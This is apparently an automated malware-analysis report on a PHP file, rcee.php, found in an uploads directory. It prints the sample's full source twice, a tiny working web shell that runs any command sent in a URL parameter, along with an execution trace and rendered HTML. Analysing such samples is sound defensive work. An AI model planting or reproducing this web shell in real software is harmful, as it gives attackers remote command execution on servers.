PHP Malware Analysis

rcee.php

md5: a1d7cd857bce45bd7dba5a8c8da2593d

Jump to:

Screenshot


Attributes

Input


Deobfuscated PHP code

<html>
<body>
<form method="GET" name="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
<input type="TEXT" name="0" autofocus id="0" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php 
echo `{$_GET[0]}`;
?>
</pre>
</body>
</html>

Execution traces

data/traces/a1d7cd857bce45bd7dba5a8c8da2593d_trace-1676255566.8623.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:33:12.760192]
1	0	1	0.000314	393520
1	3	0	0.000381	394968	{main}	1		/var/www/html/uploads/rcee.php	0	0
2	4	0	0.000405	394968	basename	0		/var/www/html/uploads/rcee.php	3	1	'/uploads/rcee.php'
2	4	1	0.000431	395040
2	4	R			'rcee.php'
2	5	0	0.000477	394968	shell_exec	0		/var/www/html/uploads/rcee.php	8	1	''
2	5	1	0.000509	395000
2	5	R			FALSE
1	3	1	0.000524	394968
			0.000579	314232
TRACE END   [2023-02-13 00:33:12.760494]


Generated HTML code

<html><head></head><body>
<form method="GET" name="rcee.php">
<input type="TEXT" name="0" autofocus="" id="0" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre></pre>

</body></html>

Original PHP code

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="0" autofocus id="0" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?=`$_GET[0]`?>
</pre>
</body>
</html>